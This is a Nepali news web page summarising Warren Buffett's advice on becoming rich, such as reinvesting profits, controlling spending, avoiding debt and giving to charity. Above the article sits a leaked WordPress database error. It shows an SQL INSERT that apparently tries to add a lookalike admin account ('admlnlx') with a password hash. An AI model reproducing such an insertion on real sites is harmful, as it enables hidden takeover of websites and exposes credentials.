WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpyfTjR6PJr4AaVa6Aji7kwoMR5GiU/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 09:51:24', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस १२ –
जो पनि छिट्टै धनी हुन चाहन्छ । मेहनत नगरी त्यत्तिकै धनी हुन त सकिँदैन तर मेहनतका साथसाथै बुद्धि पनि खियाउनु जरूरी छ । विश्वका सर्वाधिक धनीमध्येका एक वारेन बफेटले आफू कसरी धनी भएँ भनी बताएका छन् । उनको टिप्स तपाईंलाई पनि काम लाग्ला ।
नाफा भयो कि फेरि लगानी गरिहाल्नुस् । स्टक मार्केटबाट फाइदा उठाएपछि खर्च गरिदिन मन लाग्छ । यसो नगर्नुस् । नाफाको रकम फेरि लगानी गर्नुस् । यसैगरी सम्पत्ति बढ्दै जाने हो ।
अरूभन्दा फरक हुनुस् । अर्काले के भन्यो त्यसका पछाडि नदौडनुस् । अरूले मतलब नगरेको सानो कम्पनीमा लगानी गरेर धनी भएका हुन् बफेट ।
कुनै निर्णय लिनुपर्नेछ भने लिइहाल्नुस् । अनावश्यक सोचेर बस्दा अर्काले उछिट्याइदिन्छ ।
कुनै पनि डील गर्दा आफूलाई कति फाइदा हुन्छ पहिल्यै विचार गर्नुस् । दुःख गरेर पनि फाइदा भएन भने पछुताउनुपर्ने हुन्छ ।
सानोसानो खर्चको पनि हिसाब राख्नुस् । खर्चमा नियन्त्रण राख्दा पनि नाफा बढाउन सकिन्छ । अनावश्यक खर्च किन गर्नु ?
धेरै ऋण पनि ठीक होइन । ऋणमा बाँच्नुको कुनै मजा छैन । ऋण लिइएको छ भने त्यसलाई चुक्ता गरिहाल्नेतिर लाग्नुस् । ऋणमुक्त भएपछि पैसा बचाएर लगानी गर्नुस् ।
धैर्य गर्नुस् । धैर्य गरेर निरन्तर लागिरहेमा तपाईंले स्थापित प्रतिस्पर्धीलाई पनि हराउन सक्नुहुन्छ ।
सम्पत्ति थुपार्दैमा धनी हुने होइन । परोपकारमा पनि लाग्नुपर्छ ।
वारेनबफेट डट्कम